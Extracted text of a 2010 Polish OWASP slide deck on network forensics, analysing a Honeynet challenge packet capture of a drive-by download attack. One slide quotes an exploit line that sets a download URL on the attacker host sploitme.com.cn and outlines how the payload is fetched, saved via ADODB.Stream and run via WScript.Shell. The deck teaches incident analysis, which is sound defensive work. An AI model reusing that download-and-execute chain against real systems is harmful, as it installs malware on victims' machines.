63
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org Network Forensic Co mówią złapane pakiety? Paweł Goleń [email protected] 2010-06-10

OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

  • Upload
    others

  • View
    1

  • Download
    0

Embed Size (px)

Citation preview

Page 1: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Network ForensicCo mówią złapane pakiety?

Paweł Goleń[email protected]

2010-06-10

Page 2: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

2OWASP

Zamiast agendy

Kontynuacja tematów z poprzedniego spotkaniaBędziemy badać malware, atak drive-by downloadSpojrzenie z perspektywy ruchu sieciowegoPodobna technika dla innych incydentów

Network Forensic – dlaczego na OWASP?Nie ma oprogramowania idealnegoIncydenty należy zbadać, zwłaszcza te (nie)udane

Im więcej źródeł informacji, tym lepiej– Ruch sieciowy zawiera WSZYSTKIE informacje

Dobrze wiedzieć jak TO działa Aplikacja HTTP TCP IP Ethernet → → → → W przypadku zainteresowania tematem bezpieczeństwa

Page 3: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

3OWASP

The 20 Coolest Jobs in Information Security

Page 4: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

4OWASP

Co będziemy robić

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 5: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

5OWASP

Gość specjalny: Przykładowy incydent

Źródło: Honeynet Project ChallengesForensic Challenge 2010 - browsers under attack

Kilka założeń na początekNie rozwiązujemy zadania (odpowiedzi na pytania)Staramy się określić co się stało, kto i jak atakowałZakładamy, że nie wiemy (prawie) NIC

Prezentacja to tylko przykładMożna spróbować innego podejściaMożna skorzystać z innych (lepszych?) narzędzi

Narzędzie nie zniweluje braku wiedzy!

Page 6: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

6OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 7: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

7OWASP

Krok 1: Statystyka

Page 8: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

8OWASP

Krok 2: Endpoints

Page 9: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

9OWASP

Krok 3: Conversations - TCP

Page 10: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

10OWASP

Krok 3: Conversations - UDP

Page 11: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

11OWASP

Czego się dowiedzieliśmy

Główna aktywność na porcie 80 (HTTP?)Warto też rzucić okiem na:

DNS (wykorzystywany jako C&C) Wykorzystanie tunelowania

– Po/w protokole DNS– Po prostu po porcie 53

Doskonała metoda na płatne hotspoty

DHCP (Rouge DHCP Servers) Podmiana serwerów DNS (DNSChanger) „Wstrzyknięcie” wrogiego serwera proxy (mój pomysł :P)

– WPAD, DHCP opcja 252

Wszelkie odchylenia od „normy”

Page 12: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

12OWASP

Jakie sieci?

10.0.2/24, 10.0.3/24, 10.0.4/24, 10.0.5/2410.0.x.2, 10.0.x.15 – na podstawie DHCP

192.168.1.1 – serwer DNS192.168.56/24 - ???

192.168.56.50, 192.168.56.51, 192.168.56.52209.85.128.0/17 - GOGL

209.85.227.99, 209.85.227.100, 209.85.227.10664.236.114.1 - www.honeynet.org74.125.0/16 - GOGL

74.125.77.101, 74.125.77.102

Page 13: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

13OWASP

Czy możemy coś wykluczyć?

Niektóre adresy są „bardziej ryzykowne”Domeny typu *.cn, *.ruSieci należące do „egzotycznych” krajówAdresy „przypominające” inne (phishing?)

Inne adresy/sieci są bardziej zaufaneZaufane, ale nie znaczy „pewne”

Może zostać osadzony „wrogi skrypt” SQLi XSS

Nie można zakładać, że „znana” strona nie zaraża

Page 14: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

14OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 15: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

15OWASP

Gdzie są klienci?

Klienci == ofiaryW zasadzie to już wiemy (Conversations - TCP)

Spróbujmy znaleźć ich przez DHCPPrzy okazji można się coś o nich dowiedzieć

Page 16: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

16OWASP

Gdzie są klienci – inny sposób

Klienci łączą się z serweremWystarczy znaleźć źródła połączeń na port 80

Pierwszy element 3-way handshake SYN -> SYN/ACK -> ACK

Wireshark i display filter: tcp.flags == 0x2 and tcp.dstport == 80 (tcp.flags == 0x2 or tcp.flags == 0x12) and tcp.port == 80 http.request <- jeszcze inny sposób

Lista klientów: 10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15

Page 17: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

17OWASP

Ciekawostka – kiedy klienci byli aktywni

Page 18: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

18OWASP

Gdzie są serwery

http://xkcd.com/742/

Page 19: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

19OWASP

Zagadka – czego brakuje na tym obrazku?

Page 20: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

20OWASP

Gdzie są zapytania DNS?

Brak zapytań DNS o adresy (też jest śladem!)rapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn

Prawdopodobnie zmodyfikowany plik HostsKto i dlaczego dokonał modyfikacji

Tu prawdopodobnie na potrzeby przykładu→ Malware często modyfikuje plik Host

– Blokowanie dostępu» Samoobrona aktualizacje, narzędzia, konkurencja→

– Ale nie tylko w tym celu...

Page 21: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

21OWASP

PWS-Banker.y!hosts

Page 22: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

22OWASP

Co już wiemy

Klienci10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15

„Dziwne” serwery, brak zapytań DNSrapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn

„Bezpieczne” serweryPozostałe (Google, Honeynet)

Przynajmniej na potrzeby prezentacji

Page 23: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

23OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 24: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

24OWASP

Ciekawostka: Wizualizacje

Netgrokhttp://www.cs.umd.edu/projects/netgrok/

WizualizacjePełnego zrzutu ruchuAktywności poszczególnych klientów (ofiar)Informację o sieciach trzeba podać

Czy to się do czegoś przydajeNa slajdach wygląda niezbyt ciekawieTrochę lepiej sprawdza się na komputerze

Identyfikacja „głośnych” węzłów w sieci

Page 25: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

25OWASP

Wizualizacja 1 - całość

Page 26: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

26OWASP

Wizualizacja 2 - 10.0.2.15

Page 27: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

27OWASP

Wizualizacja 3 - 10.0.3.15

Page 28: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

28OWASP

Wizualizacja 4 - 10.0.4.15

Page 29: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

29OWASP

Wizualizacja 5 - 10.0.5.15

Page 30: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

30OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 31: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

31OWASP

Jak klient trafia na stronę

Page 32: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

32OWASP

A jak trafia na sploitme.com.cn

Po nagłówku Referer można ustalić gdzie następuje przekierowanieTam należy szukać osadzonego „wrogiego” skryptu

Page 33: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

33OWASP

I co się dzieje na sploitme.com.cn?

Page 34: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

34OWASP

I kolejna wizualizacja

Jak wygląda sekwencja zdarzeńZbudowanie drzewa odwołań

Na podstawie żądań klienta W oparciu o nagłówek Referer

Do wizualizacji posłuży Tshark Python Graphiz

A rezultat(y) wyglądają mniej więcej tak

Page 35: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

35OWASP

Wizualizacja dla 10.0.2.15

Page 36: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

36OWASP

Wizualizacja dla 10.0.3.15 (fragment)

Page 37: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

37OWASP

Kolejne podsumowanie zebranych informacji

Jak klient trafia na stronęWpisanie adresu URL w paskuKliknięcie w mailu (phishing)

Gdzie ukryty jest „wrogi” kodDocelowe przekierowanie na sploitme.com.cnA przekierowuje z

rapidshare.com.eyu32.ru shop.honeynet.sg

Page 38: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

38OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 39: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

39OWASP

Przydatne narzędzie: Network Miner

Network Miner - Network Forensic Analysis Toolhttp://networkminer.sourceforge.net/Niestety(?) – aplikacja dla Windows

W tym przypadku wykorzystany do:Odzyskiwania plików z HTTPMożna również uzyskać informacje o hostach

System operacyjny, nawiązywane sesje Odpytywane nazwy DNS, WINS,

Można uzyskać w inny sposób (Wireshark) Z Network Miner bywa wygodniej :)

Page 40: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

40OWASP

Przykład: Informacje o 10.0.2.15

Page 41: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

41OWASP

Przykład: Informacje o sploitme.com.cn

Page 42: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

42OWASP

Przykład: Odzyskiwanie plików

Page 43: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

43OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 44: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

44OWASP

Sekwencja zdarzeń dla 10.0.3.15

Page 45: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

45OWASP

Page 46: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

46OWASP

Co jest w rapidshare(...)/login.php

Page 47: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

47OWASP

„Klasyczny” drive-by download

Na „niewinnej” stronie osadzony skryptSkrypt obfuskowany

Można odkodować, np.: Malzilla– http://malzilla.sourceforge.net/

Nie zawsze tak łatwo– Przykłady z poprzednich prezentacji na OWASP

Ostatecznie: ukryty iframePrzekierowanie na „atakującą” stronę

Tu próba wykorzystania podatności w przeglądarce Często payload „dziwnie” przypomina moduły Metasploit Payload może być uzależniony od przeglądarki

Page 48: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

48OWASP

Jak atakowana jest przeglądarka (show.php)

Prawie jak w Metasploit

Page 49: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

49OWASP

Jaki jest cel exploita na stronie?

Pobranie pliku wykonywalnegoPobranie za pomocą XMLHttpRequest

var urltofile='http://sploitme.com.cn/fg/load.php?e=1

Zapisanie na dysku za pomocą ADODB.StreamUruchomienie go

Uruchomienie przez WScript.Shell

Page 50: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

50OWASP

Ciekawostka: atak personalizowany?

Page 51: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

51OWASP

Co robi video.exe

Co robi pobrany program?

Page 52: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

52OWASP

Przykładowe piaskownice

CWSandboxhttp://mwanalysis.org/http://www.sunbeltsecurity.com/sandbox/

Anubishttp://anubis.iseclab.org/

ThreatExperthttp://www.threatexpert.com/submit.aspx

Norman Sandboxhttp://www.norman.com/technology/norman_sandbox/

Page 53: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

53OWASP

I ciekawostka z piaskownicy

Page 54: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

54OWASP

Gdzie jesteśmy

Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków

Page 55: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

55OWASP

Klient 10.0.2.15

Page 56: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

56OWASP

Klient 10.0.3.15

Page 57: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

57OWASP

Klient 10.0.4.15

Page 58: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

58OWASP

Klient 10.0.5.15

Page 59: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

59OWASP

Nagłówek User-Agent można sfałszować

Page 60: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

60OWASP

Podsumowanie na koniec

Co udało się ustalićZidentyfikować klientów i serwery,Określić „atakującą” stronęOkreślić jak klienci trafiają na „atakującą” stronęOdzyskać pliki z ruchu sieciowego

Pliki HTML wraz ze skryptami wykorzystanymi w ataku Plik wykonywalny pobierany na atakowaną stację

Określić akcje wykonywane przez pobierany plikOdtworzyć prawdopodobny scenariusz zdarzeń

Co robi użytkownik, co dzieje się samo

Zauważyć fałszowany nagłówek User-Agent

Page 61: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

61OWASP

Narzędzia

Wiresharkhttp://www.wireshark.org/

Network Miner, xplicohttp://networkminer.sourceforge.net/http://www.xplico.org/

Satori (ale i p0f, Ettercap, ...) http://myweb.cableone.net/xnih/

NetGrokhttp://www.cs.umd.edu/projects/netgrok/

Malzillahttp://malzilla.sourceforge.net/

Page 62: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

62OWASP

Przykłady

Honeynet Project Challengeshttp://www.honeynet.org/challenges

Network Forensics Puzzle Contesthttp://forensicscontest.com/

Wireshark: Sample Captureshttp://wiki.wireshark.org/SampleCaptures

Page 63: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack

63OWASP

Pytania?